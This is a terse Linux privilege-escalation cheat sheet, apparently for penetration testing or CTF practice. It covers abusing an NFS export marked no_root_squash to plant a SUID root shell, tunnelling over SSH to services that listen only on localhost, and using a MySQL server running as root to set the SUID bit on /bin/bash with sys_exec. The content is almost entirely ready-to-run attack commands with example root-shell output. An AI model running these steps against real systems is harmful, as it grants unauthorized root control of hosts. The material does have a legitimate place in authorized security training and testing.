NFS & INTERNAL SERVICES

NFS no_root_squash

Root on NFS = root on target — Compile SUID /bin/bash on share

cat /etc/exports
If no_root_squash: mount share, create SUID binary
Example Output
cat /etc/exports
/home/backup *(rw,no_root_squash)

On attacker:
mount -t nfs 10.10.10.5:/home/backup /tmp/nfs
cp /bin/bash /tmp/nfs/rootbash
chmod +s /tmp/nfs/rootbash

On target:
/home/backup/rootbash -p
# whoami
root

Internal services

Services only on 127.0.0.1 — May be vulnerable, port forward to access

netstat -tulnp
ss -tulnp
Example Output
netstat -tulnp
127.0.0.1:8080  python3  <- internal web app
127.0.0.1:3306  mysqld   <- internal MySQL

SSH tunnel to access:
ssh -L 8080:127.0.0.1:8080 user@target
Browse: http://127.0.0.1:8080 on attacker

MySQL as root

Database running as root — UDF = User Defined Function for RCE

mysql -u root -p
If root: SELECT sys_exec('chmod u+s /bin/bash');
or UDF exploit
Example Output
ps aux | grep mysql
root  1234  /usr/sbin/mysqld
(MySQL running as root!)

mysql -u root -p
SELECT sys_exec('chmod u+s /bin/bash');

bash -p
# whoami
root